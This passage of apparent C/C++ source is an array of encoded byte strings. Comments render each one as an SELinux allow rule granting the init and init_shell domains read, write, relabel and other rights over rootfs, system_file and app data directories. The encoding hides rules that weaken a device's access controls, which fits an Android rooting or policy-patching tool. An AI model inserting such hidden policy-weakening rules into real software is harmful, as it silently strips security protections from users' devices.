    "\x63\x53\x2f\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x06\x09", // "allow:init:system_file:dir:read"
    "\x63\x53\x10\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x34\x37\x0e\x39\x0a", // "allow:init:system_file:dir:write"
    "\x63\x53\x12\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:init:system_file:dir:getattr"
    "\x63\x53\x12\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:init:system_file:dir:setattr"
    "\x63\x53\x16\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x31\x06\x07\x0a\x31\x0b\x37\x0c\x32", // "allow:init:system_file:dir:relabelfrom"
    "\x63\x53\x14\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x31\x06\x07\x0a\x31\x39\x0c", // "allow:init:system_file:dir:relabelto"
    "\x63\x53\x1a\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x30\x0a\x06\x37\x00\x0d", // "allow:init:system_app_data_file:dir:search"
    "\x63\x53\x1c\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x06\x09\x09\xdc\x33\x06\x32\x0a", // "allow:init:system_app_data_file:dir:add_name"
    "\x63\x53\x1f\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x32\x0c\x3b\x0a\xdc\x33\x06\x32\x0a", // "allow:init:system_app_data_file:dir:remove_name"
    "\x63\x53\x18\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x0c\x35\x0a\x33", // "allow:init:system_app_data_file:dir:open"
    "\x63\x53\x18\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x06\x09", // "allow:init:system_app_data_file:dir:read"
    "\x63\x53\x19\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x34\x37\x0e\x39\x0a", // "allow:init:system_app_data_file:dir:write"
    "\x63\x53\x1b\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:init:system_app_data_file:dir:getattr"
    "\x63\x53\x1b\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:init:system_app_data_file:dir:setattr"
    "\x63\x53\x1f\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x31\x06\x07\x0a\x31\x0b\x37\x0c\x32", // "allow:init:system_app_data_file:dir:relabelfrom"
    "\x63\x53\x1d\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x31\x06\x07\x0a\x31\x39\x0c", // "allow:init:system_app_data_file:dir:relabelto"
    "\x63\x53\x13\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x30\x0a\x06\x37\x00\x0d", // "allow:init:app_data_file:dir:search"
    "\x63\x53\x15\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x06\x09\x09\xdc\x33\x06\x32\x0a", // "allow:init:app_data_file:dir:add_name"
    "\x63\x53\x18\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x32\x0c\x3b\x0a\xdc\x33\x06\x32\x0a", // "allow:init:app_data_file:dir:remove_name"
    "\x63\x53\x11\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x0c\x35\x0a\x33", // "allow:init:app_data_file:dir:open"
    "\x63\x53\x11\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x06\x09", // "allow:init:app_data_file:dir:read"
    "\x63\x53\x12\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x34\x37\x0e\x39\x0a", // "allow:init:app_data_file:dir:write"
    "\x63\x53\x14\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:init:app_data_file:dir:getattr"
    "\x63\x53\x14\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:init:app_data_file:dir:setattr"
    "\x63\x53\x18\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x31\x06\x07\x0a\x31\x0b\x37\x0c\x32", // "allow:init:app_data_file:dir:relabelfrom"
    "\x63\x53\x16\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x31\x06\x07\x0a\x31\x39\x0c", // "allow:init:app_data_file:dir:relabelto"
    "\x63\x53\x15\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x30\x0a\x06\x37\x00\x0d", // "allow:init:shell_data_file:dir:search"
    "\x63\x53\x17\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x06\x09\x09\xdc\x33\x06\x32\x0a", // "allow:init:shell_data_file:dir:add_name"
    "\x63\x53\x1a\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x32\x0c\x3b\x0a\xdc\x33\x06\x32\x0a", // "allow:init:shell_data_file:dir:remove_name"
    "\x63\x53\x13\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x0c\x35\x0a\x33", // "allow:init:shell_data_file:dir:open"
    "\x63\x53\x13\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x06\x09", // "allow:init:shell_data_file:dir:read"
    "\x63\x53\x14\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x34\x37\x0e\x39\x0a", // "allow:init:shell_data_file:dir:write"
    "\x63\x53\x16\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:init:shell_data_file:dir:getattr"
    "\x63\x53\x16\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:init:shell_data_file:dir:setattr"
    "\x63\x53\x1a\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x31\x06\x07\x0a\x31\x0b\x37\x0c\x32", // "allow:init:shell_data_file:dir:relabelfrom"
    "\x63\x53\x18\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x31\x06\x07\x0a\x31\x39\x0c", // "allow:init:shell_data_file:dir:relabelto"
    "\x63\x53\x2e\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x30\x0a\x06\x37\x00\x0d", // "allow:init:lnk_file:dir:search"
    "\x63\x53\x10\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x06\x09\x09\xdc\x33\x06\x32\x0a", // "allow:init:lnk_file:dir:add_name"
    "\x63\x53\x13\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x32\x0c\x3b\x0a\xdc\x33\x06\x32\x0a", // "allow:init:lnk_file:dir:remove_name"
    "\x63\x53\x2c\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x0c\x35\x0a\x33", // "allow:init:lnk_file:dir:open"
    "\x63\x53\x2c\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x06\x09", // "allow:init:lnk_file:dir:read"
    "\x63\x53\x2d\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x34\x37\x0e\x39\x0a", // "allow:init:lnk_file:dir:write"
    "\x63\x53\x2f\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:init:lnk_file:dir:getattr"
    "\x63\x53\x2f\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:init:lnk_file:dir:setattr"
    "\x63\x53\x13\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x31\x06\x07\x0a\x31\x0b\x37\x0c\x32", // "allow:init:lnk_file:dir:relabelfrom"
    "\x63\x53\x11\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x31\x06\x07\x0a\x31\x39\x0c", // "allow:init:lnk_file:dir:relabelto"
    "\x63\x53\x10\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x0b\x3a\x30\x0a\xff\x09\x0e\x37\xff\x30\x0a\x06\x37\x00\x0d", // "allow:init_shell:fuse:dir:search"
    "\x63\x53\x12\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x0b\x3a\x30\x0a\xff\x09\x0e\x37\xff\x06\x09\x09\xdc\x33\x06\x32\x0a", // "allow:init_shell:fuse:dir:add_name"
    "\x63\x53\x15\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x0b\x3a\x30\x0a\xff\x09\x0e\x37\xff\x37\x0a\x32\x0c\x3b\x0a\xdc\x33\x06\x32\x0a", // "allow:init_shell:fuse:dir:remove_name"
    "\x63\x53\x2e\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x0b\x3a\x30\x0a\xff\x09\x0e\x37\xff\x0c\x35\x0a\x33", // "allow:init_shell:fuse:dir:open"
    "\x63\x53\x2e\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x0b\x3a\x30\x0a\xff\x09\x0e\x37\xff\x37\x0a\x06\x09", // "allow:init_shell:fuse:dir:read"
    "\x63\x53\x2f\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x0b\x3a\x30\x0a\xff\x09\x0e\x37\xff\x34\x37\x0e\x39\x0a", // "allow:init_shell:fuse:dir:write"
    "\x63\x53\x11\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x0b\x3a\x30\x0a\xff\x09\x0e\x37\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:init_shell:fuse:dir:getattr"
    "\x63\x53\x11\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x0b\x3a\x30\x0a\xff\x09\x0e\x37\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:init_shell:fuse:dir:setattr"
    "\x63\x53\x15\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x0b\x3a\x30\x0a\xff\x09\x0e\x37\xff\x37\x0a\x31\x06\x07\x0a\x31\x0b\x37\x0c\x32", // "allow:init_shell:fuse:dir:relabelfrom"
    "\x63\x53\x13\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x0b\x3a\x30\x0a\xff\x09\x0e\x37\xff\x37\x0a\x31\x06\x07\x0a\x31\x39\x0c", // "allow:init_shell:fuse:dir:relabelto"
    "\x63\x53\x12\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x37\x0c\x0c\x39\x0b\x30\xff\x09\x0e\x37\xff\x30\x0a\x06\x37\x00\x0d", // "allow:init_shell:rootfs:dir:search"
    "\x63\x53\x14\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x37\x0c\x0c\x39\x0b\x30\xff\x09\x0e\x37\xff\x06\x09\x09\xdc\x33\x06\x32\x0a", // "allow:init_shell:rootfs:dir:add_name"
    "\x63\x53\x17\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x37\x0c\x0c\x39\x0b\x30\xff\x09\x0e\x37\xff\x37\x0a\x32\x0c\x3b\x0a\xdc\x33\x06\x32\x0a", // "allow:init_shell:rootfs:dir:remove_name"
    "\x63\x53\x10\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x37\x0c\x0c\x39\x0b\x30\xff\x09\x0e\x37\xff\x0c\x35\x0a\x33", // "allow:init_shell:rootfs:dir:open"
    "\x63\x53\x10\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x37\x0c\x0c\x39\x0b\x30\xff\x09\x0e\x37\xff\x37\x0a\x06\x09", // "allow:init_shell:rootfs:dir:read"
    "\x63\x53\x11\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x37\x0c\x0c\x39\x0b\x30\xff\x09\x0e\x37\xff\x34\x37\x0e\x39\x0a", // "allow:init_shell:rootfs:dir:write"
    "\x63\x53\x13\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x37\x0c\x0c\x39\x0b\x30\xff\x09\x0e\x37\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:init_shell:rootfs:dir:getattr"
    "\x63\x53\x13\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x37\x0c\x0c\x39\x0b\x30\xff\x09\x0e\x37\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:init_shell:rootfs:dir:setattr"
    "\x63\x53\x17\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x37\x0c\x0c\x39\x0b\x30\xff\x09\x0e\x37\xff\x37\x0a\x31\x06\x07\x0a\x31\x0b\x37\x0c\x32", // "allow:init_shell:rootfs:dir:relabelfrom"
    "\x63\x53\x15\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x37\x0c\x0c\x39\x0b\x30\xff\x09\x0e\x37\xff\x37\x0a\x31\x06\x07\x0a\x31\x39\x0c", // "allow:init_shell:rootfs:dir:relabelto"
    "\x63\x53\x17\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x30\x0a\x06\x37\x00\x0d", // "allow:init_shell:system_file:dir:search"
    "\x63\x53\x19\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x06\x09\x09\xdc\x33\x06\x32\x0a", // "allow:init_shell:system_file:dir:add_name"
    "\x63\x53\x1c\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x32\x0c\x3b\x0a\xdc\x33\x06\x32\x0a", // "allow:init_shell:system_file:dir:remove_name"
    "\x63\x53\x15\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x0c\x35\x0a\x33", // "allow:init_shell:system_file:dir:open"
    "\x63\x53\x15\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x06\x09", // "allow:init_shell:system_file:dir:read"
    "\x63\x53\x16\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x34\x37\x0e\x39\x0a", // "allow:init_shell:system_file:dir:write"
    "\x63\x53\x18\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:init_shell:system_file:dir:getattr"
    "\x63\x53\x18\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:init_shell:system_file:dir:setattr"
    "\x63\x53\x1c\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x31\x06\x07\x0a\x31\x0b\x37\x0c\x32", // "allow:init_shell:system_file:dir:relabelfrom"
    "\x63\x53\x1a\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x31\x06\x07\x0a\x31\x39\x0c", // "allow:init_shell:system_file:dir:relabelto"
    "\x63\x53\x00\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x30\x0a\x06\x37\x00\x0d", // "allow:init_shell:system_app_data_file:dir:search"
    "\x63\x53\x02\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x06\x09\x09\xdc\x33\x06\x32\x0a", // "allow:init_shell:system_app_data_file:dir:add_name"
    "\x63\x53\x05\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x32\x0c\x3b\x0a\xdc\x33\x06\x32\x0a", // "allow:init_shell:system_app_data_file:dir:remove_name"
    "\x63\x53\x1e\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x0c\x35\x0a\x33", // "allow:init_shell:system_app_data_file:dir:open"
    "\x63\x53\x1e\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x06\x09", // "allow:init_shell:system_app_data_file:dir:read"
    "\x63\x53\x1f\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x34\x37\x0e\x39\x0a", // "allow:init_shell:system_app_data_file:dir:write"
    "\x63\x53\x01\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:init_shell:system_app_data_file:dir:getattr"
    "\x63\x53\x01\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:init_shell:system_app_data_file:dir:setattr"
    "\x63\x53\x05\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x31\x06\x07\x0a\x31\x0b\x37\x0c\x32", // "allow:init_shell:system_app_data_file:dir:relabelfrom"
    "\x63\x53\x03\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x31\x06\x07\x0a\x31\x39\x0c", // "allow:init_shell:system_app_data_file:dir:relabelto"
    "\x63\x53\x19\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x30\x0a\x06\x37\x00\x0d", // "allow:init_shell:app_data_file:dir:search"
    "\x63\x53\x1b\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x06\x09\x09\xdc\x33\x06\x32\x0a", // "allow:init_shell:app_data_file:dir:add_name"
    "\x63\x53\x1e\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x32\x0c\x3b\x0a\xdc\x33\x06\x32\x0a", // "allow:init_shell:app_data_file:dir:remove_name"
    "\x63\x53\x17\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x0c\x35\x0a\x33", // "allow:init_shell:app_data_file:dir:open"
    "\x63\x53\x17\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x06\x09", // "allow:init_shell:app_data_file:dir:read"
    "\x63\x53\x18\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x34\x37\x0e\x39\x0a", // "allow:init_shell:app_data_file:dir:write"
